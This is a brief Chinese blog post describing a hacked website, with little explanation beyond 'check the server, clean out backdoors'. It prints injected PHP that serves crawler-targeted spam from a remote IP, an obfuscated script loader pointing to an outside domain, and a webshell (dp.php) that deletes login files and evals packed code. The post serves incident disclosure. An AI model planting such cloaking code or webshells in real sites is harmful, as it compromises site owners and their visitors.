的
主页被添加 了以下代码
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,'ogou')!== false || strpos($key,'aidu')!==false || strpos($key,'360')!==false || strpos($key,'so')!==false)
{
header("Content-Type: text/html;charset=gb2312");
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$file = file_get_contents('http://103.76.85.67:8213/'."/index.php?host=".$host_name."&url=" . $_SERVER['QUERY_STRING'] . "&domain=" . $_SERVER['SERVER_NAME']);
echo $file;
exit();
}else{
echo '<script type="text/javascript"> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,104,116,116,112,115,58,47,47,115,102,104,117,102,104,50,46,99,111,109,47,121,108,99,46,106,115,34,62,60,47,115,99,114,105,112,116,62,); document.write(xt); </script>';
}
文件夹下多了个:dp.php %20
<?php error_reporting(E_ERROR); unlink('user.php'); unlink('../member/login.php'); @ini_set('display_errors','Off'); @ini_set('max_execution_time',20000); @ini_set('memory_limit','256M'); header("content-Type: text/html; charset=utf-8"); $password = "21232f297a57a5a743894a0e4a801fc3"; //Viv, bebegim.. define('Viv, bebegim.','Denzel-你的英雄'); // 标题 function s(){ $str = " 111****11"
$str = str_rot13($str); m($str); } function m($str){ global $password; $jj = ''; eval($jj.pack('H*',$str).$jj); } s(); ?>
检查服务器,清扫后门
文章来源:刘俊涛的博客欢迎关注公众号、留言、评论,一起学习。
若有帮助到您,欢迎点击推荐,您的支持是对我坚持最好的肯定(*^_^*)